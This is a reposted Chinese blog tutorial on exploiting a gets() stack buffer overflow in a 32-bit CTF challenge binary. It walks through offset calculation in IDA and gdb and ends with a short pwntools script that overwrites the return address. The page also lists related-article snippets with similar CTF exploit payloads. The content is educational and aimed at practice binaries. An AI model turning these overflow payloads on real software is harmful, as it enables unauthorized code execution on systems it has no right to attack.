[pwn入门] 1. get函数缓冲区溢出

最新推荐文章于 2022-04-12 20:18:56 发布
最新推荐文章于 2022-04-12 20:18:56 发布
阅读量690 收藏 1
点赞数
原文链接:https://segmentfault.com/a/1190000017933679
版权

查看保护

clipboard.png

寻找漏洞

ida打开elf文件:

clipboard.png

gets函数存在缓冲区溢出漏洞,我们可以通过超长的字符串来覆盖缓冲区,从而修改ROP。为了达到这个目的,我们需要首先
计算,输入的&s的堆栈地址位置距离堆栈的底部ebp的位置。Ebp的下一个地址,就是记录了返回地址的位置

s距离返回地址的偏移

gdb打开,并设置断点。

clipboard.png

$esp : 0xffffce50
$ebp : 0xffffced8

徒手计算

s的位置 esp+80h-64h = esp+1c =FFFFCE6C
与ebp的差为 108。因为是32位,返回地址位置为108+4 = 112

工具计算

生成字符串:

clipboard.png

gdb输入字符串:

clipboard.png

查询ebp中的内容:

clipboard.png

108与之前手工计算S距离ebp的偏移相同

编写py

from pwn import *

pwn = process("./pwn1")
pwn.recv()
payload = 'A'*(112)+p32(0x0804863A)
pwn.sendline(payload)
pwn.interactive()

end

clipboard.png

参考文章
Linux PWN从入门到熟练

weixin_34092370
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2018 10 11 pwn的学习0x2 gets函数和fgets函数 ,新的参数传递方式
startr4ck
10-11 1459
还是一一样的没有binsh字符串 所以我们需要继续读取字符串到内存当中  在id中寻找函数 发现并没有我们想要的提权函数 我们可以尝试着搜索gadgets去寻找我们想要找到的 看到有汇编代码   mov dword ptr[edi],ebp 和 pop edi ebp pop edi ebp 后面就跟参数edi 放地址,ebp放数值。 就可以将ebp的数值放在edi位置上   直接利...
PWN入门系列(2)栈溢出
小心信科理化声
12-02 1463
PWN入门系列(2) 栈溢出 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向栈上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
程序的机器级表示——《深入理解计算机系统》
菜鸟的自留地-mooyang
03-18 9376
机器级代码 计算机系统使用了多种不同形式的抽象,利用更简单的抽象模型来隐藏实现的细节。 对于机器级编程来说,其中两种抽象尤为重要: 1、指令集体系结构(Instruction set architecture ISA) 它定义了处理器状态、指令的格式,以及每条指令对状态的影响。 IA32将程序的行为描述成好像每条指令时按顺序执行的,一条指令结束后,下一条再开始。(实际上处理器并发
从get和post的区别说缓冲区溢出
weixin_30773135的博客
10-29 171
网页表单(form)提交时可选择2种提交方式:get和post。我们大都知道提交表单数据时应该使用post,也知道get方式不安全。是什么造成了get和post的区别,本文将从http协议层面分析,来说说get和post境遇不同的根本原因。 先来看看一个简单的hello woeld页面的http消息: 浏览器请求”http://127.0.0.1/test/hello.html”发送...
EFS Web Server 7.2 GET请求缓冲区溢出漏洞分析与利用
giantbranch的专栏
03-28 3603
简介EFS Web Server是一个可以通过web端管理服务器文件的软件,发送GET请求长度过长会触发缓冲区溢出漏洞 分析来源:https://www.exploit-db.com/exploits/39008/实验环境 WinXP sp3 中文版 EFS Web Server7.2 immunity debugger windbg IDA mona 漏洞
c语言gets_C语言入坑指南-缓冲区溢出
weixin_39902345的博客
11-29 299
前言缓冲区溢出通常指的是向缓冲区写入了超过缓冲区所能保存的最大数据量的数据。如果说之前所提到的一些问题可能只是影响部分功能的实现,那么缓冲区溢出将可能会造成程序运行终止,被不安全代码攻击等严重问题,因此我们不得不特别重视。一个缓冲区溢出的例子对于下面的程序:#include 定义一个字符数组buff,数组长度为8,使用strcpy函数将p所指向的字符串常量拷贝到buff中。运行程序,结果如下:01...
PWN基础知识及基础栈溢出手法
山高路远
04-12 4005
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
gdb 查看是否 栈溢出_入坑 CTF-PWN 之 栈溢出入门
weixin_36064196的博客
01-17 756
好久没看过pwn题目了,写一个入门的教程顺便复习了:1. 安装gdb-pedagit clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbinitecho "DONE! debug your program with gdb and enjoy"2. 一些比较有用的技巧...
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
CTF|栈溢出入门题hellopwn解题思路
skyattractive的博客
05-31 1654
CTF|栈溢出入门题hellopwn解题思路及个人总结 解题思路 将题目下载下来后拖入虚拟机ubuntu中,利用checksec hellopwn 查到有关文件保护信息 NX enabled 表示这个文件NX保护已经打开(个人总结会写各种保护) 输入./hellopwn命令行将文件运行 走一边流程,发现程序很简单 拖入IDA 按照往常一样去找栈溢出的地方,这里我们找到了read这个函数,读入10个字节 (伪代码中一些函数和变量的名字我自行修改了,方便观看) 题意很明显,我们只需让v2等于1853186
gets 函数漏洞执行代码
草草君
11-20 694
gets 函数漏洞执行代码 最近学习了 AFL 工具,同时根据进行了gets函数的漏洞执行代码,具体的原理分析准备以后有时间进行详细分析,目前只是做一个记录,主要内容参考自这里. 环境:kali 4.13.0-kali1-amd64 1. 安装工具peda :   在命令行执行 git clone https://github.com/longld/peda.git ~/peda ech...
BUUCTF(Pwn)get_started_3dsctf_2016
半岛铁盒的博客
03-27 357
from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(pay..
攻防世界PWN- get_shell & hello_pwn & when_did_you_born13
qq_45771413的博客
04-22 205
找到了初学pwn的笔记_(:з」∠)_ get_shell 查看保护 IDA分析 主函数赤条条地写着system("/bin/sh") 预计直接访问就可以getshell EXP from pwn import * p=remote('220.249.52.134',46898) p.interactive() flag cyberpeace{cecb28ddca24a0b26fe5689bc39dc1ee} hello_pwn 查看保护 NX保护,堆栈不可执行 IDA 打印欢迎界面,输入
今天你pwn了吗(上)
蚁景网安学院
05-07 4009
前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录 下 非高分题目的 解题思路和 知识讲解。特别是文章里的函数,我特意整理了下,还请好好学习下。test...
pwn by example学习笔记(一)
沐沐的博客
05-15 1426
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分栈溢出原理(示例:ret2text)首先,获取要pwn的程序的基本信息这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx了解了程序的基本信息以后,就运行下程序发现只有输入和输出,而且就只有一个输入点。放到ida里面去跑一下可以看到,gets从标准输入设备读字符串函数...
buu pwn刷题——分类题型1——gets溢出无脑填充
苗_的博客
09-07 1103
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
XCTF pwn例题思路整理 侵删
londonyan的博客
11-15 3905
XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1")处理报错 2 read() 栈溢出 函数定义:ssize_t read(int fd, void * buf, size_t count); 函数说明:read()会把参数fd所指的文件传送count 个字节到buf 指针所指的内存中。 返回值:返回值为实际读取到的字节数, 如果返回0, 表示已到达文...
第一个pwn案例---栈溢出的学习
MrTreebook的博客
07-13 379
第一个pwn案例—栈溢出的学习 漏洞:利用gets()函数以回车判断输入结束,并不检查输入字符串长度的特点, 将函数返回地址改写成期望执行的函数地址 在64位条件下进行实验: 1.准备好测试的程序 #include <stdio.h> #include <string.h> void success() { puts("You have already pwned me."); } void vulnerable() { char s[12]; gets(s); puts(s); }
pwn -----gets 漏洞的利用
qq_41071646的博客
12-29 2089
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值